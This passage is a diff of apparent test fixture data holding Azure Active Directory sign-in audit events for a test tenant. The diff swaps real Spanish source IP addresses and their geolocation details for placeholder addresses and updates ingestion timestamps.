Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"e031670b-bb84-45ee-94ff-0e70a8cd1138\",\"InterSystemsId\":\"40077a75-7b58-4623-a64a-f1b7de70fa54\",\"IntraSystemId\":\"4d1bd763-9b0b-4d5a-bda9-5c7a0a0a6000\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -1934,22 +1682,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "country_name": "Spain", - "location": { - "lon": -3.684, - "lat": 40.4172 - }, - "country_iso_code": "ES" - }, - "as": { - "number": 16299, - "organization": { - "name": "XFERA Moviles S.A." - } - }, - "ip": "37.29.234.179" + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -1963,7 +1696,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "37.29.234.179", + "ActorIpAddress": "67.43.156.14", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -2013,7 +1746,7 @@ "asr" ], "ip": [ - "37.29.234.179" + "67.43.156.14" ] }, "organization": { @@ -2025,12 +1758,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "37.29.234.179", - "ip": "37.29.234.179" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "event": { - "ingested": "2021-06-17T07:32:46.051521700Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"37.29.234.179\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"37.29.234.179\",\"CreationTime\":\"2020-02-08T14:33:54\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d39944c4-6766-4a89-8d5a-c789175830ee\",\"InterSystemsId\":\"425503c9-ccbf-4674-8f1e-4d56510474fd\",\"IntraSystemId\":\"57ef1056-6ce2-424a-b241-ce3939d00900\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970146600Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:33:54\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d39944c4-6766-4a89-8d5a-c789175830ee\",\"InterSystemsId\":\"425503c9-ccbf-4674-8f1e-4d56510474fd\",\"IntraSystemId\":\"57ef1056-6ce2-424a-b241-ce3939d00900\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -2069,25 +1802,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -2101,7 +1816,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -2151,7 +1866,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -2163,12 +1878,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051524500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:12\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"6f2b7716-1acc-450d-ae13-afad7e02d07e\",\"InterSystemsId\":\"4409eeeb-0ca5-42dd-99d9-4a6b2fabfa4f\",\"IntraSystemId\":\"0c8fcffc-a810-4a85-b8e2-3a2fda925c00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970152300Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:12\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"6f2b7716-1acc-450d-ae13-afad7e02d07e\",\"InterSystemsId\":\"4409eeeb-0ca5-42dd-99d9-4a6b2fabfa4f\",\"IntraSystemId\":\"0c8fcffc-a810-4a85-b8e2-3a2fda925c00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -2207,25 +1922,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2239,7 +1936,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -2289,7 +1986,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -2301,12 +1998,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051527400Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:35\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"47f3c440-3fb7-4b5e-9c20-455470b289d2\",\"InterSystemsId\":\"4542ce7e-270b-435e-8f81-ee23ea74be75\",\"IntraSystemId\":\"9718abaa-220e-49c5-8c9b-588d32b8db00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970156200Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:35\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"47f3c440-3fb7-4b5e-9c20-455470b289d2\",\"InterSystemsId\":\"4542ce7e-270b-435e-8f81-ee23ea74be75\",\"IntraSystemId\":\"9718abaa-220e-49c5-8c9b-588d32b8db00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -2345,22 +2042,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "country_name": "Spain", - "location": { - "lon": -3.684, - "lat": 40.4172 - }, - "country_iso_code": "ES" - }, - "as": { - "number": 16299, - "organization": { - "name": "XFERA Moviles S.A." - } - }, - "ip": "37.29.234.179" + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -2374,7 +2056,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "37.29.234.179", + "ActorIpAddress": "67.43.156.14", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Success", @@ -2424,7 +2106,7 @@ "asr" ], "ip": [ - "37.29.234.179" + "67.43.156.14" ] }, "organization": { @@ -2436,12 +2118,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "37.29.234.179", - "ip": "37.29.234.179" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "event": { - "ingested": "2021-06-17T07:32:46.051530200Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"37.29.234.179\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"37.29.234.179\",\"CreationTime\":\"2020-02-08T14:38:40\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"5a3435d0-229a-41c8-bd21-b4f2b662d0f6\",\"InterSystemsId\":\"4836e306-1460-4f34-ab55-a74c9a14f50d\",\"IntraSystemId\":\"2fde8302-c39e-40b6-9c7f-1bb9d4800a00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970160100Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:38:40\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"5a3435d0-229a-41c8-bd21-b4f2b662d0f6\",\"InterSystemsId\":\"4836e306-1460-4f34-ab55-a74c9a14f50d\",\"IntraSystemId\":\"2fde8302-c39e-40b6-9c7f-1bb9d4800a00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -2480,25 +2162,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -2512,7 +2176,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -2562,7 +2226,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -2574,12 +2238,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051533Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"5aff2d1c-b203-46a6-96f0-b8f908f0e968\",\"InterSystemsId\":\"4a50a549-adf3-4a22-9037-7fd8cd3d0116\",\"IntraSystemId\":\"1d856a16-b179-41ab-9c0d-af1d2b925100\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970163400Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"5aff2d1c-b203-46a6-96f0-b8f908f0e968\",\"InterSystemsId\":\"4a50a549-adf3-4a22-9037-7fd8cd3d0116\",\"IntraSystemId\":\"1d856a16-b179-41ab-9c0d-af1d2b925100\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -2618,25 +2282,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -2650,7 +2296,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -2700,7 +2346,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -2712,12 +2358,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051535800Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 